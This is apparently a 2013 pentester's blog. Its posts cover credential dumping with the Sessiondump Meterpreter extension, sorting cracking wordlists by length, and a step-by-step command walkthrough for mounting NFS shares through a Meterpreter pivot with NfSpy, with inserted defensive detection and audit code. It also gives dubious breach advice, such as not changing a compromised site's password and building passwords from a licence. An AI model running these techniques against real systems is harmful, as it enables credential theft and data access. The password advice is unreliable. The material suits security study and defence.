Monday
Apr082013

Sessiondump Meterpreter Extension

Mimikatz is awesome, right? So is WCE. But both have one fatal flaw: even though you can execute them in memory {link}, you still have to have the binaries, remember the command to execute them in memory, and ultimately transfer the entire binary over so that Metasploit can do its thing.

Then along came SessionDump. I only noticed this because someone was tweeting congratulations to someone on writing it:

Screen Shot 2013 04 08 at 5 55 48 AM

No blog post or huge Vegas lights talk on it at DefCon or Blackhat. Just posted online in a corner of the Internet:

Screen Shot 2013 04 07 at 6 57 40 PM

http://www.hsc.fr/ressources/outils/sessiondump/

Before we get started, let's be clear about one thing. Sessiondump, while awesome, doesn't do everything that Mimikatz does. However, it does do the feature of Mimikatz that I use the most: logged-on user hash dumping, as well as wdigest clear-text password dumping. It does this as a Meterpreter extension that operates using reflective DLL injection. Does that solve the minor issues we had with Mimikatz? As of right now, only partially. This code was simply posted online, not in a pull request or submitted to Metasploit in any way, so you still have to have the binary plus the code. What about the remembering? Surely it makes it so I can just tab-complete my way to passwords, right? Yup, it does, but until/if it is in the Metasploit trunk you will still have to remember how to get it installed (which we will go over in a bit). As for the final question: yes, it does still transfer a complete DLL over to the host, the same as any of the other extensions (not to disk, mind you, just memory).

Without further ado, let's go ahead and get the file and do a bunch of extracting.

Screen Shot 2013 04 07 at 7 15 02 PM

Screen Shot 2013 04 07 at 7 15 54 PM

And finally, place everything in its correct place, which the author was nice enough to make easy by laying out the archive the same as the Metasploit directory structure:

Screen Shot 2013 04 08 at 2 33 31 AM

Cool, everything should be good to go. Let's use this thing. I'm using psexec to get a shell, but any way you get a Windows native Meterpreter is fine, with one caveat, and it's the same as with any of the other aforementioned tools: you need to be Admin (past UAC, with SeDebugPrivilege) or NT AUTHORITY\SYSTEM. After that it's cake; load the extension:

Screen Shot 2013 04 07 at 10 42 06 PM

Here are the available commands:

Screen Shot 2013 04 07 at 10 42 22 PM

And run getHashes:

Screen Shot 2013 04 07 at 10 43 04 PM 2

or getwDigestPasswords:

Screen Shot 2013 04 07 at 10 43 39 PM

That's it, free passwords, YAY...
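From the defender's side, the requirements above (an elevated process holding SeDebugPrivilege or running as SYSTEM, plus reading the LSASS process to get at those credentials) are what detection usually keys on. The following is an added example, not from this post and not part of Sessiondump: a small detector over constructed Sysmon Event ID 10 (ProcessAccess) records that flags any non-allow-listed image obtaining a handle to lsass.exe with PROCESS_VM_READ set. The flat "Key=Value;..." record encoding, the sample events and the allow-list are assumptions made for the example; the field names follow Sysmon's schema and the access-right constants come from winnt.h.

```python
"""Flag process-access events against lsass.exe.

Added example from the defender's side; not part of the post or of
Sessiondump. Runs a minimal detector over constructed Sysmon Event ID 10
(ProcessAccess) records. Field names follow Sysmon's schema; the flat
"Key=Value;Key=Value" encoding, the sample records and the allow-list are
all made up for this example.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Process access rights from winnt.h. Reading another process's memory needs
# PROCESS_VM_READ, so an lsass.exe handle carrying that bit is the signal.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Constructed allow-list of images that legitimately open lsass.exe on this
# host; in practice this is tuned per environment (AV/EDR agents and so on).
ALLOWED_SOURCE_IMAGES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "UtcTime=2013-04-08 09:43:01;SourceImage=C:\\Windows\\System32\\svchost.exe;"
    "SourceProcessId=612;TargetImage=C:\\Windows\\System32\\lsass.exe;"
    "TargetProcessId=548;GrantedAccess=0x1000",
    "UtcTime=2013-04-08 09:43:04;SourceImage=C:\\Windows\\Temp\\update.exe;"
    "SourceProcessId=3120;TargetImage=C:\\Windows\\System32\\lsass.exe;"
    "TargetProcessId=548;GrantedAccess=0x1010",
    "UtcTime=2013-04-08 09:43:09;SourceImage=C:\\Windows\\System32\\notepad.exe;"
    "SourceProcessId=3310;TargetImage=C:\\Windows\\explorer.exe;"
    "TargetProcessId=1804;GrantedAccess=0x1010",
    "UtcTime=2013-04-08 09:43:15;SourceImage=C:\\Tools\\procexp.exe;"
    "SourceProcessId=3412;TargetImage=C:\\Windows\\System32\\lsass.exe;"
    "TargetProcessId=548;GrantedAccess=0x1400",
    "UtcTime=2013-04-08 09:43:20;SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\svc.exe;"
    "SourceProcessId=3550;TargetImage=C:\\Windows\\System32\\lsass.exe;"
    "TargetProcessId=548;GrantedAccess=0x1fffff",
]


@dataclass
class Finding:
    utc_time: str
    source_image: str
    source_pid: int
    granted_access: int


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=Value;Key=Value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_lsass(image: str) -> bool:
    """True when the image path's file name is lsass.exe (case-insensitive)."""
    return image.lower().rsplit("\\", 1)[-1] == "lsass.exe"


def detect(lines: Iterable[str]) -> List[Finding]:
    """Return a Finding for every non-allow-listed image that opened lsass.exe
    with PROCESS_VM_READ in the granted access mask."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if not is_lsass(ev.get("TargetImage", "")):
            continue
        src = ev.get("SourceImage", "")
        if src.lower() in ALLOWED_SOURCE_IMAGES:
            continue
        access = int(ev.get("GrantedAccess", "0"), 16)
        if access & PROCESS_VM_READ:
            findings.append(Finding(ev.get("UtcTime", ""), src,
                                    int(ev.get("SourceProcessId", "0")), access))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.utc_time} pid={f.source_pid} {f.source_image} "
              f"opened lsass.exe with 0x{f.granted_access:x}")
```

Only the update.exe and svc.exe events are reported: svchost.exe is allow-listed, notepad.exe is not touching lsass.exe, and procexp.exe asked for query rights only (0x1400 has no PROCESS_VM_READ bit). A real deployment would add the CallTrace field and tune the allow-list, but the handle-right check is the core of it.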

Possible issues you may run into:

1) If you are on an x64 box and Meterpreter isn't running in an x64 process, it will fail, saying that it doesn't have the correct version offsets. Here is how you can check:

Screen Shot 2013 04 08 at 2 40 29 AM

x64 system, and Meterpreter is x86/win32. Let's find a good process to migrate into and kick it from there. Winlogon isn't the greatest choice, since if Meterpreter decides to crash it during migration the system will go down, whereas a service running as SYSTEM will probably just restart if something fails.

Screen Shot 2013 04 07 at 10 43 04 PM

2) If by any chance you are running it against a system the author hasn't gotten the offsets for. I don't have a screenshot for this one because he covers all the languages I have CMs for, but the author was awesome enough to include a few Python scripts that can help you generate the correct offsets. I'll show you by running it on my lsass and wdigest.dll files, even though he already has this data included in the CSV file that comes with Sessiondump.

That's all for now, folks, may the shells be with you.


Tuesday
Mar192013

Metasploit Mastery @BlackHatEvents USA 2013

Just a quick post to say that egypt and I will be giving Metasploit Mastery twice (2 x 2-day sessions) at BlackHat USA 2013. Come out and get your Metasploit on in Vegas with us.

Linky: http://www.blackhat.com/us-13/training/metasploit-mastery.html

Current fill rate of July 27-28 session:

Current fill rate of July 29-30 session:

EOM

Monday
Mar182013

Length Sorting Wordlists

This is one of those stupid simple things that are easy to forget, so I'm posting it here. Wordlists and dictionaries are awesome for cracking password hashes, and although, thanks to things like Mimikatz and WCE, I often don't have to, there are times when it's important.

Now, having John, Hashcat, or Cain go through a dictionary is a 1-for-1 hit: no time wasted no matter how it's sorted, and it's usually best to sort by most common first so you get earlier hits. However, if you start throwing rules into the mix, that equation changes. If you have "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii" on the 3rd line of your dictionary, testing every possible permutation where you replace an 'i' with a 1 is going to take a very long time.

Both Hashcat and John deal with this by limiting the length at which permutations occur. (HC/JTR peeps, please correct me if I'm wrong.) Cain, on the other hand, will try every possibility and hang on the 3rd line for years (over-exaggerated). How do you solve that? Easy: remove any word over a certain length. While that does work, and is very similar to what HC/JTR do, I don't like losing words from my dictionary, so I tend to sort them by length. That way, all the nasty ones are near the end and I can scale back the rules on them.

Doing that is very simple:


awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_ls.txt


That's it. Basic, simple and stored here for reference.
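One thing the awk | sort -n | cut pipeline loses is the most-common-first ordering within each length: sort -n breaks ties by comparing the whole line, so words of equal length come out alphabetically rather than in their original order. The following is an added example, not from the post, that does the same length sort in Python, where the sort is stable, and adds a split around a length threshold so a heavy rule set can run on the short words and a scaled-back one on the long tail instead of dropping them. The sample wordlist is constructed.

```python
"""Length-sort a wordlist without losing the most-common-first order.

Added example, not from the post. Python's sort is stable, so words of the
same length keep their input order; the post's awk | sort -n | cut pipeline
breaks ties on the whole line and reorders equal-length words alphabetically.
Lengths are counted in characters, as awk's length does in a UTF-8 locale.
"""
from typing import Iterable, List, Tuple

# Constructed sample wordlist, most common first (as a real list would be).
SAMPLE_WORDS = [
    "password",
    "qwerty",
    "abc123",
    "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii",
    "123456",
    "iloveyou",
    "zz",
]


def read_wordlist(text: str) -> List[str]:
    """Split file text into candidates, dropping only line terminators.

    Leading and trailing spaces can be part of a password, so they are kept;
    empty lines are skipped.
    """
    words: List[str] = []
    for line in text.split("\n"):
        line = line.rstrip("\r")
        if line:
            words.append(line)
    return words


def sort_by_length(words: Iterable[str]) -> List[str]:
    """Order by length; equal-length words keep their input order."""
    return sorted(words, key=len)


def partition_by_length(words: Iterable[str], max_len: int) -> Tuple[List[str], List[str]]:
    """Split into (short, long) around max_len, keeping every word.

    Run the full rule set on the short part and a reduced one on the long
    tail; nothing is discarded.
    """
    short: List[str] = []
    long_tail: List[str] = []
    for w in words:
        (short if len(w) <= max_len else long_tail).append(w)
    return short, long_tail


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        # surrogateescape keeps non-UTF-8 bytes that real wordlists contain.
        with open(sys.argv[1], encoding="utf-8", errors="surrogateescape") as fh:
            text = fh.read()
    else:
        text = "\n".join(SAMPLE_WORDS)
    sys.stdout.write("\n".join(sort_by_length(read_wordlist(text))) + "\n")
```

Run it as `python length_sort.py rockyou.txt > rockyou_ls.txt` for the same result as the awk pipeline, with ties left in their original order; with the sample list, "qwerty" stays ahead of "abc123" and "123456", which sort -n would have reversed.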


Monday
Mar042013

Mounting NFS shares through Meterpreter with NfSpy

You've found an NFS share on a pentest. It's sharing out your target's home directories (/home) and some SAN with all of the Windows AD users' "home" directories under /volumes/users/. You only have a Meterpreter session, though... enough back story. The problem is that Metasploit doesn't really have any auxiliary modules or otherwise to access the things on those shares. Please correct me if I'm wrong, but there also aren't any tools for talking to NFS shares over TCP-only proxies.

Enter NfSpy: https://github.com/bonsaiviking/NfSpy

While its original intent was to aid in bypassing NFS security controls, it has the right set of options to make mounting NFS over Meterpreter possible.

First we set up our route so that the aux module will go over the Meterpreter session:


route add 192.168.1.0 255.255.255.0 1

The 1 on the end is the Meterpreter session number the traffic will go through. Next up is to find out what exports are available:


msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > show options

Module options (auxiliary/scanner/nfs/nfsmount):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    111              yes       The target port
THREADS  1                yes       The number of concurrent threads

msf auxiliary(nfsmount) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(nfsmount) > run
[+] 192.168.1.50 NFS Export: /home [192.168.1.0/24]
[+] 192.168.1.50 NFS Export: /volume/users [192.168.1.0/24]


Looks like access is restricted by IP range, but luckily the victim is in said range. The final piece of information we need is the TCP port(s) that mountd is listening on. There is a Metasploit module that can help us there too:


msf > use auxiliary/scanner/misc/sunrpc_portmapper
msf auxiliary(sunrpc_portmapper) > show options

Module options (auxiliary/scanner/misc/sunrpc_portmapper):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    111              yes       The target port
THREADS  1                yes       The number of concurrent threads

msf auxiliary(sunrpc_portmapper) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(sunrpc_portmapper) > run

[+] 192.168.1.50 - Programs available
rpcbind - 111/tcp
rpcbind - 111/udp
status - 46797/udp
status - 55731/tcp
nfs - 2049/tcp
nfs_acl - 2049/tcp
nfs - 2049/udp
nfs_acl - 2049/udp
nlockmgr - 54167/udp
nlockmgr - 38216/tcp
mountd - 52569/udp
mountd - 37719/tcp
mountd - 39099/udp
mountd - 55763/tcp
mountd - 37808/udp
mountd - 54457/tcp
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Cool, so let's target /home first, with the mountd TCP port of 37719. Keeping our route where it is, we set up Metasploit's SOCKS proxy:


msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The address to listen on
SRVPORT  1080             yes       The port to listen on.

msf auxiliary(socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks4a) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server


I chose 9050 as my SRVPORT since I have proxychains already set up for that port (à la Tor), and I highly recommend setting the SRVHOST to 127.0.0.1, unless you either firewall that port off from the Internet or don't mind having the Anons of the world surf through your Meterpreter session into your clients.

Next up is actually using NfSpy (create or prep a directory so you can mount to it first):


proxychains nfspy -d -o server=192.168.1.50:/home,nfsport=2049/tcp,mountport=37719/tcp,rw /root/nfspy/mount
ProxyChains-3.1 (http://proxychains.sf.net)
FUSE library version: 2.8.6
nullpath_ok: 0
unique: 1, opcode: INIT (26), nodeid: 0, insize: 56
INIT: 7.16
flags=0x0000007b
max_readahead=0x00020000
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.1.50:37719-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.1.50:2049-<><>-OK
INIT: 7.12
flags=0x00000011
max_readahead=0x00020000
max_write=0x00020000
unique: 1, success, outsize: 40


proxychains nfspy -d -o server=192.168.1.50:/home,nfsport=2049/tcp,mountport=37719/tcp,rw /root/nfspy/mount

Let's break that command down. Proxychains wraps nfspy so that it goes through our Metasploit socks4a proxy. The -d tells NfSpy to stay in the foreground, and -o introduces the options. server is our target IP; only use a hostname if your attacker box can resolve it to the right IP. The export we found with the Metasploit module is up next, then the default NFS port of 2049 (nfsport). The mountport option comes from the portmapper Metasploit module. For both of these port options, be sure you specify /tcp, or you'll just be waiting, as there isn't really a timeout and Proxychains doesn't show UDP attempts. rw is for read-write, and finally comes the location to mount to.

If you see that second Proxychains request, for port 2049, it is usually a good indicator that it worked; if not, you have probably run into anything from a permissions issue to a local mount problem. NfSpy uses FUSE, which can be really silent when problems arise or give errors that tell you nothing meaningful. That's why I'm using the -d option that keeps nfspy in the foreground, just so I can detect any issues. Let's see if that worked:


ls /root/nfspy/mount
user1
user2
user3
user4

Remember, big directories might take a while to navigate being tunneled like this. Here is the output from the ls on the nfspy side:


unique: 166, opcode: OPENDIR (27), nodeid: 34, insize: 48
unique: 166, success, outsize: 32
unique: 167, opcode: READDIR (28), nodeid: 34, insize: 80
readdir[0] from 0
unique: 167, success, outsize: 208
unique: 168, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user3
getattr /home/user3
NODEID: 40
unique: 168, success, outsize: 144
unique: 169, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user1
getattr /home/user1
NODEID: 41
unique: 169, success, outsize: 144
unique: 170, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user4
getattr /home/user4
NODEID: 42
unique: 170, success, outsize: 144
unique: 171, opcode: LOOKUP (1), nodeid: 34, insize: 46
LOOKUP /home/user2
getattr /home/user2
NODEID: 43
unique: 171, success, outsize: 144

That's it. You can mount read-write (rw) or read-only (ro) depending on what you want to do and how quiet you want to be.

Last note, you can't just CTRL-C an nfspy mount, you need to use `fusermount -u /root/nfspy/mount` to kill it. It's another fuse issue. If anyone has a better way to do this I'm all ears.
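The exports above were "protected" by an IP range, and that is exactly what a pivoted session walks around; on top of that, NfSpy's whole reason for existing is that a plain AUTH_SYS export trusts whatever uid/gid the client claims. From the defender's side, the fix is in /etc/exports, and the following is an added example, not from the post and not part of NfSpy, that parses an exports file and flags the settings that make this kind of access easy: broad address ranges or wildcards, no_root_squash, insecure, and the absence of a Kerberos sec= flavor. The exports content is constructed (the paths echo the post's /home and /volume/users, the hosts are made up), and treating a /24 or larger as "broad" is a policy threshold chosen for this example, not an NFS rule.

```python
"""Audit /etc/exports for settings a pivoted NFS client can take advantage of.

Added example from the defender's side; not part of the post or of NfSpy.
The exports text is constructed, and the /24 "broad range" threshold is a
policy choice of this example.
"""
import ipaddress
from dataclasses import dataclass
from typing import List

SAMPLE_EXPORTS = """\
# constructed /etc/exports
/home          192.168.1.0/24(rw,sync,no_subtree_check)
/volume/users  192.168.1.0/24(rw,sync,no_root_squash) 10.0.0.0/8(ro)
/srv/public    *(ro,sync)
/srv/backup    backup01.example.internal(rw,sync,insecure,sec=krb5p)
/srv/odd       (rw)
"""


@dataclass
class ExportEntry:
    path: str
    client: str
    options: List[str]


@dataclass
class Issue:
    path: str
    client: str
    severity: str
    message: str


def parse_exports(text: str) -> List[ExportEntry]:
    """Parse exports(5) lines: a path followed by client(options) specs.

    A spec with nothing before the parenthesis, such as "/srv (rw)", applies
    to every host; exports(5) warns about exactly that typo.
    """
    entries: List[ExportEntry] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]
        for spec in specs:
            client, sep, rest = spec.partition("(")
            options = [o for o in rest.rstrip(")").split(",") if o] if sep else []
            entries.append(ExportEntry(path, client or "*", options))
    return entries


def is_broad_network(client: str, max_prefix: int = 24) -> bool:
    """Wildcards, or CIDR/netmask ranges at or wider than max_prefix."""
    if client == "*" or "*" in client or "?" in client:
        return True
    try:
        net = ipaddress.ip_network(client, strict=False)
    except ValueError:
        return False  # hostname or @netgroup: not judged here
    return net.num_addresses > 1 and net.prefixlen <= max_prefix


def trusts_client_uids(options: List[str]) -> bool:
    """True when AUTH_SYS (client-asserted uid/gid) is accepted, which is the
    default whenever no sec= option names a Kerberos flavor only."""
    flavors = [o.split("=", 1)[1].split(":") for o in options if o.startswith("sec=")]
    return not flavors or any("sys" in f for f in flavors)


def audit(entries: List[ExportEntry]) -> List[Issue]:
    """Return one Issue per risky setting found on each export/client pair."""
    issues: List[Issue] = []
    for e in entries:
        opts = set(e.options)
        if is_broad_network(e.client):
            issues.append(Issue(e.path, e.client, "high" if "rw" in opts else "medium",
                                "reachable from a wide address range; a host-based "
                                "restriction does not stop a client pivoted into the range"))
        if "no_root_squash" in opts:
            issues.append(Issue(e.path, e.client, "high",
                                "no_root_squash: a remote root user keeps root on the export"))
        if "insecure" in opts:
            issues.append(Issue(e.path, e.client, "medium",
                                "insecure: requests from unprivileged source ports accepted"))
        if trusts_client_uids(e.options):
            issues.append(Issue(e.path, e.client, "medium",
                                "AUTH_SYS only: uid/gid are whatever the client claims; "
                                "use sec=krb5, krb5i or krb5p"))
    return issues


if __name__ == "__main__":
    for i in audit(parse_exports(SAMPLE_EXPORTS)):
        print(f"[{i.severity}] {i.path} {i.client}: {i.message}")
```

On the sample file only the Kerberos-protected /srv/backup export escapes the AUTH_SYS finding, and the /24 exports that let the post's pivot work come out as high severity because they are also read-write.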

Saturday
Mar022013

Suggestions on what to do when a service you use gets compromised

It seems like every week there is a new compromise of some service or another. But as a user what are you supposed to do with this knowledge? Here are some suggestions on things to do or think about when reacting:

Do you use the password you use there anywhere else?

  • Think about starting to use a password manager like LastPass, 1Password, KeePass, or a product like Yubico. This way you can very easily use different passwords for different sites.
  • Sit down and start changing it everywhere you use that password. Not just web sites: any machines (your work account) or applications are also possible targets. Start with the sites, machines, and applications that are most sensitive to you.
  • It's ok to have a hand-written list of passwords for sites. One of my favorite suggestions is to take your driver's license or business card and generate passwords by using every Xth character on the license, basing X on how many letters are in the website's name. So you use every 6th character for Google.
  • It is NOT ok to store your passwords for anything in an Excel, Word or text document. These are easy pickings for hackers and almost always targeted.
  • Again, think about using a password manager.

Do NOT change your password on the affected site or service immediately. You may never know the extent of the compromise, but if the company says anything to the effect of "still under investigation" or "preliminary results", there is a chance that the attacker has also compromised the password reset mechanism, so changing your password would just hand the attacker the new one you have chosen.

Do NOT stop using the service. If they have made it public that they were compromised, especially if they came out with the information first, the company is one of the few that takes its dedication to its users seriously. If anything it's a positive (that they came out and said something, not that they were compromised). Very few companies are open about such things, as it happens much more often than people want to admit.

Got other suggestions for people on how to handle such news? Leave a comment and I'll include it in the main post with attribution.